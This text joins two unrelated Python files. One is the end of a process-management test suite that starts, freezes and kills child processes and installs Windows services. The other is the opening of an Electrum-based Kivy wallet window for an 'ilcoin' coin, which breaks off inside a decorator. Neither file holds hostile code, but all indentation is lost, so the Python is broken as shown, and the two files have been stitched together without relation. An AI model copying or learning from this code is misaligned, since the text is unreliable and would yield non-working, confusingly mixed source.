self.check_server_ports_unbound()
def process_exists_or_access_denied(self, pid):
try:
return process_exists(pid)
except AccessDeniedError as e:
#It is most likely that this process does exist!
return True
def kill_process_ignore_access_denied(self, pid):
try:
return kill_process(pid)
except AccessDeniedError as e:
#Can't do anything about this
pass
def try_and_stop_everything_for_tear_down(self):
#Override this if you can do something about stopping everything
pass
def tearDown(self):
command_file = os.path.join(os.path.dirname(__file__), 'test', 'tmp', 'command.txt')
if os.path.exists(command_file):
os.remove(command_file)
self.wait_for_parent_to_stop(5)
#Now check that no processes are left over:
start_time = time.time()
processes_left_running = []
for pid_file in self.get_pid_files():
with open(pid_file, "r") as f:
pid = f.read().strip()
if pid:
while self.process_exists_or_access_denied(int(pid)) and time.time() - start_time < 5:
time.sleep(0.3)
if self.process_exists_or_access_denied(int(pid)):
processes_left_running.append(int(pid))
os.remove(pid_file)
if processes_left_running:
for pid in processes_left_running:
try:
self.kill_process_ignore_access_denied(pid)
except Exception as e:
logging.warning("Error killing process with pid %d: %s", pid, _traceback_str())
self.try_and_stop_everything_for_tear_down()
start_time = time.time()
for pid in processes_left_running:
while self.process_exists_or_access_denied(int(pid)) and time.time() - start_time < 40:
time.sleep(0.3)
self.check_server_ports_unbound()
self.assertFalse(processes_left_running, msg="There should have been no PIDs left running but there were: %s" % (', '.join([str(p) for p in processes_left_running])))
def start_up(self, test_command=None, wait_for_middle_child=True, wait_for_children=True):
command_file = os.path.join(os.path.dirname(__file__), 'test', 'tmp', 'command.txt')
if test_command:
with open(command_file, "w") as f:
f.write(test_command)
elif os.path.exists(command_file):
os.remove(command_file)
self.start_parent_process()
#Wait up to 15 secs for the all ports to be available (the parent might wait 10 for a middle child):
start_time = time.time()
still_waiting = True
while still_waiting and time.time() - start_time < 15:
still_waiting = False
for i in range(4):
if i > 0 and not wait_for_children:
continue
if i == 2 and not wait_for_middle_child:
continue
try:
s = socket.socket()
try:
s.connect(("localhost", Config.get_starting_port_nr()+i))
except socket.error, e:
still_waiting = True
break
finally:
s.close()
if still_waiting:
time.sleep(0.3)
self.assertFalse(still_waiting, "Waited 10 seconds and some http ports are still not accessible")
def assert_middle_child_port_unbound(self):
port = Config.get_starting_port_nr()+2
logging.info("Checking for ability to bind to port %d", port)
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if not sys.platform.startswith('win'):
#On linux I need this setting cos we are starting and stopping things
#so frequently that they are still in a STOP_WAIT state when I get here
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", port))
except Exception as e:
self.fail("Middle child port is not unbound as expected")
finally:
serversocket.close()
def get_pid_files(self):
return glob.glob(os.path.join(self.pid_dir, "*.pid"))
def kill_parent(self):
for pid_file in self.get_pid_files():
if os.path.basename(pid_file).startswith('c'):
continue
with open(pid_file, "r") as f:
pid = f.read().strip()
kill_process(int(pid))
def test_parent_stop(self):
self.start_up()
self.send_parent_http_command("stop")
def test_parent_exit(self):
self.start_up()
self.send_parent_http_command("exit")
def test_parent_crash(self):
if self.skip_crash_test:
self.skipTest(self.skip_crash_test)
self.start_up()
self.send_parent_http_command("crash")
def test_parent_interrupt_main(self):
self.start_up()
self.send_parent_http_command("interrupt_main")
def test_parent_kill(self):
self.start_up()
self.kill_parent()
def test_parent_stop_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("stop")
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_parent_exit_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("exit")
def test_parent_crash_child_locked_up(self):
if self.skip_crash_test:
self.skipTest(self.skip_crash_test)
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("crash")
def test_parent_interrupt_main_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("interrupt_main")
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_parent_kill_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.kill_parent()
def test_parent_exit_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
self.send_parent_http_command("exit")
def test_child_exit_on_start(self):
self.start_up(test_command='child_exit_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
def test_child_error_during_run(self):
self.start_up(test_command='child_error_during_run', wait_for_middle_child=False)
self.send_parent_http_command("stop")
def test_child_freeze_on_start(self):
self.start_up(test_command='child_freeze_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
self.wait_for_parent_to_stop(11)
def test_child_error_on_start(self):
self.start_up(test_command='child_error_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
def test_child_error_during_init(self):
self.start_up(test_command='child_error_during_init', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
def test_child_freeze_during_init(self):
self.start_up(test_command='child_freeze_during_init', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
self.wait_for_parent_to_stop(11)
def test_child_crash_on_start(self):
if self.skip_crash_test:
self.skipTest(self.skip_crash_test)
self.start_up(test_command='child_crash_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
self.send_parent_http_command("stop")
if not sys.platform.startswith('win'):
def test_sigint(self):
self.start_up()
os.kill(self.parent_process.pid, signal.SIGINT)
def test_sigint_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
os.kill(self.parent_process.pid, signal.SIGINT)
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_file_open_by_parent_before_fork_can_be_closed_and_deleted(self):
self.start_up()
result = self.send_parent_http_command("close_file_and_delete_it")
self.assertEqual("OK", result, "Command to close file and delete it failed (got response: %s)" % result)
self.send_parent_http_command("stop")
def test_echo_std_err_on(self):
self.start_up(test_command='echo_std_err')
self.send_parent_http_command("stop")
def test_handles_over_commandline_off(self):
if not sys.platform.startswith('win') or not CAN_USE_EXTENDED_STARTUPINFO:
self.skipTest("This test is not supported on this platform")
self.start_up(test_command='handles_over_commandline_off')
self.send_parent_http_command("stop")
def test_handles_over_commandline_off_close_fds_off(self):
if not sys.platform.startswith('win') or not CAN_USE_EXTENDED_STARTUPINFO:
self.skipTest("This test is not supported on this platform")
self.start_up(test_command='handles_over_commandline_off_close_fds_off')
result = self.send_parent_http_command("close_file_and_delete_it")
self.assertEqual("FAIL", result, "Command to close file and delete it did not fail (got response: %s)" % result)
self.send_parent_http_command("stop")
def test_close_fds_off(self):
self.start_up(test_command='close_fds_off')
result = self.send_parent_http_command("close_file_and_delete_it")
if sys.platform.startswith('win'):
#On linux this works fine
self.assertEqual("FAIL", result, "Command to close file and delete it did not fail (got response: %s)" % result)
else:
#TODO: a relevant test on linux?
pass
self.send_parent_http_command("stop")
def test_child_comms_strategy_stdin_close(self):
self.start_up(test_command='use_cat', wait_for_children=False)
self.send_parent_http_command("stop")
def test_child_comms_strategy_none(self):
self.start_up(test_command='use_cat_comms_none', wait_for_children=False)
self.send_parent_http_command("stop")
def test_use_job_object_off(self):
self.start_up(test_command='use_job_object_off')
self.send_parent_http_command("stop")
def test_cpu_affinity_off(self):
self.start_up(test_command='cpu_affinity_off')
self.send_parent_http_command("stop")
def test_handles_over_commandline_off_file_open_by_parent(self):
if not sys.platform.startswith('win') or not CAN_USE_EXTENDED_STARTUPINFO:
self.skipTest("This test is not supported on this platform")
self.start_up(test_command='handles_over_commandline_off')
result = self.send_parent_http_command("close_file_and_delete_it")
self.assertEqual("OK", result, "Command to close file and delete it failed (got response: %s)" % result)
self.send_parent_http_command("stop")
def freeze_up_middle_child(self):
#First check that we can do this fast (i.e. things aren't stuttering because of environment):
for i in range(5):
self.send_middle_child_http_command("", timeout=4)
self.send_middle_child_http_command("hold_gil_%d" % (60*10)) #Freeze up for 10 minutes
while True:
#Try and do this request until it takes longer than 4 secs - this would mean that we have successfully got stuck
try:
self.send_middle_child_http_command("", timeout=4)
except requests.exceptions.Timeout as t:
break
def check_server_ports_unbound(self):
bound_ports = []
for pnumber in range(4):
port = Config.get_starting_port_nr() + pnumber
#I just try and bind to the server port and see if I have a problem:
logging.info("Checking for ability to bind to port %d", port)
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if not sys.platform.startswith('win'):
#On linux I need this setting cos we are starting and stopping things
#so frequently that they are still in a STOP_WAIT state when I get here
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", port))
except Exception as e:
bound_ports.append(port)
finally:
serversocket.close()
self.assertFalse(bound_ports, "The following ports are still bound: %s" % ', '.join([str(p) for p in bound_ports]))
def get_path_to_ParentProcessPy(self):
return os.path.join(os.path.dirname(__file__), 'test', 'ParentProcess.py')
def send_parent_http_command(self, command, **kwargs):
return self.send_http_command(Config.get_starting_port_nr(), command, **kwargs)
def send_middle_child_http_command(self, command, **kwargs):
return self.send_http_command(Config.get_starting_port_nr()+2, command, **kwargs)
def send_http_command(self, port, command, **kwargs):
r = requests.get('http://localhost:%d/%s' % (port, command), **kwargs)
j = r.json
if callable(j):
return j()
else:
#This is the old requests api:
return j
def wait_for_process_to_stop(self, process, timeout):
if process is None:
logging.info("No process to wait for")
return
logging.info("Waiting for process (%d) to finish", process.pid)
start_time = time.time()
while time.time()-start_time < timeout:
if process.poll() is None:
time.sleep(0.3)
class NormalSubprocessTests(_BaseProcessFamilyFunkyWebServerTestSuite):
skip_crash_test = "The crash test throws up a dialog in this context" if sys.platform.startswith('win') else None
def start_parent_process(self):
kwargs={}
if sys.platform.startswith('win'):
kwargs['creationflags'] = CREATE_BREAKAWAY_FROM_JOB
self.parent_process = subprocess.Popen(
[sys.executable, self.get_path_to_ParentProcessPy()],
close_fds=True, **kwargs)
threading.Thread(target=self.parent_process.communicate).start()
def wait_for_parent_to_stop(self, timeout):
self.wait_for_process_to_stop(getattr(self, 'parent_process', None), timeout)
if sys.platform.startswith('win'):
import win32service
import win32serviceutil
from processfamily.test.ExeBuilder import build_service_exe
from processfamily.processes import USE_PROCESS_QUERY_LIMITED_INFORMATION
class PythonWTests(_BaseProcessFamilyFunkyWebServerTestSuite):
skip_crash_test = "The crash test throws up a dialog in this context" if sys.platform.startswith('win') else None
def start_parent_process(self):
self.parent_process = subprocess.Popen(
[Config.pythonw_exe, self.get_path_to_ParentProcessPy()],
close_fds=True,
creationflags=CREATE_BREAKAWAY_FROM_JOB)
threading.Thread(target=self.parent_process.communicate).start()
def wait_for_parent_to_stop(self, timeout):
self.wait_for_process_to_stop(getattr(self, 'parent_process', None), timeout)
class WindowsServiceTests(_BaseProcessFamilyFunkyWebServerTestSuite):
@classmethod
def setUpClass(cls, service_username=None):
cls.send_stop_and_then_wait_for_service_to_stop_ignore_errors()
cls.service_exe = build_service_exe()
subprocess.check_call([cls.service_exe] + (["--username", service_username] if service_username else []) + ["install"])
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'service_exe'):
subprocess.check_call([cls.service_exe, "remove"])
def try_and_stop_everything_for_tear_down(self):
self.send_stop_and_then_wait_for_service_to_stop_ignore_errors()
def start_parent_process(self):
win32serviceutil.StartService(Config.svc_name)
def wait_for_parent_to_stop(self, timeout):
self.wait_for_service_to_stop(timeout)
@classmethod
def wait_for_service_to_stop(cls, timeout):
start_time = time.time()
while time.time()-start_time < timeout:
if win32serviceutil.QueryServiceStatus(Config.svc_name)[1] != win32service.SERVICE_STOPPED:
time.sleep(0.3)
def test_parent_interrupt_main(self):
self.skipTest("Interrupt main doesn't do anything useful in a windows service")
def test_parent_interrupt_main_child_locked_up(self):
self.skipTest("Interrupt main doesn't do anything useful in a windows service")
def test_service_stop(self):
self.start_up()
win32serviceutil.StopService(Config.svc_name)
def test_service_stop_child_locked_up(self):
self.start_up()
self.freeze_up_middle_child()
win32serviceutil.StopService(Config.svc_name)
#This needs time to wait for the child for 10 seconds:
self.wait_for_parent_to_stop(11)
def test_service_stop_child_freeze_on_start(self):
self.start_up(test_command='child_freeze_on_start', wait_for_middle_child=False)
self.assert_middle_child_port_unbound()
win32serviceutil.StopService(Config.svc_name)
#This still needs time to wait for the child to stop for 10 seconds:
self.wait_for_parent_to_stop(11)
@classmethod
def send_stop_and_then_wait_for_service_to_stop_ignore_errors(cls):
try:
win32serviceutil.StopService(Config.svc_name)
cls.wait_for_service_to_stop(20)
except Exception as e:
pass
if not USE_PROCESS_QUERY_LIMITED_INFORMATION:
def test_parent_kill(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
def test_parent_kill_child_locked_up(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
class WindowsServiceNetworkServiceUserTests(WindowsServiceTests):
@staticmethod
def grant_network_service_rights(folder, rights):
try:
subprocess.check_call(["cmd.exe", "/C", "icacls", folder, "/grant", "NETWORK SERVICE:(OI)(CI)%s" % rights])
except Exception as e:
logging.warning("icacls command returned a non-zero response for folder/file '%s'")
@classmethod
def setUpClass(cls):
#I do this just in case we left the service running by interrupting the tests
cls.send_stop_and_then_wait_for_service_to_stop_ignore_errors()
tmp_dir = os.path.join(os.path.dirname(__file__), 'test', 'tmp')
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
#Make sure network service has full access to the tmp folder (and these are inheritable)
cls.grant_network_service_rights(tmp_dir, "F")
#And read / execute access to Python, and other folders on the python path:
cls.grant_network_service_rights(os.path.abspath(sys.prefix), "RX")
done_paths = [os.path.abspath(sys.prefix)]
for path_item in sorted(sys.path, key=lambda p: len(os.path.abspath(p))):
abspath_item = os.path.abspath(path_item)
already_done = False
for p in done_paths:
if abspath_item.startswith(p):
already_done = True
break
if not already_done:
cls.grant_network_service_rights(abspath_item, "RX")
done_paths.append(abspath_item)
super(WindowsServiceNetworkServiceUserTests, cls).setUpClass(service_username="NT AUTHORITY\\NetworkService")
def test_parent_kill(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
def test_parent_kill_child_locked_up(self):
self.skipTest("I cannot kill a network service service from here - I get an access denied error")
#Remove the base class from the module dict so it isn't smelled out by nose:
del(_BaseProcessFamilyFunkyWebServerTestSuite)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
if str(intent.getScheme()).lower() in ('ilcoin', 'lightning'):
self._process_invoice_str(data)
_invoice_intent_queued = None # type: Optional[str]
def _process_invoice_str(self, invoice: str) -> None:
if not self.wallet:
self._invoice_intent_queued = invoice
return
if not self.send_screen:
self.switch_to('send')
self._invoice_intent_queued = invoice
return
if invoice.lower().startswith('ilcoin:'):
self.set_URI(invoice)
elif invoice.lower().startswith('lightning:'):
self.set_ln_invoice(invoice)
def _maybe_process_queued_invoice(self, *dt):
if not self.wallet:
return
invoice_queued = self._invoice_intent_queued
if invoice_queued:
self._invoice_intent_queued = None
self._process_invoice_str(invoice_queued)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
self._periodic_process_queued_invoice = Clock.schedule_interval(self._maybe_process_queued_invoice, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('ilcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
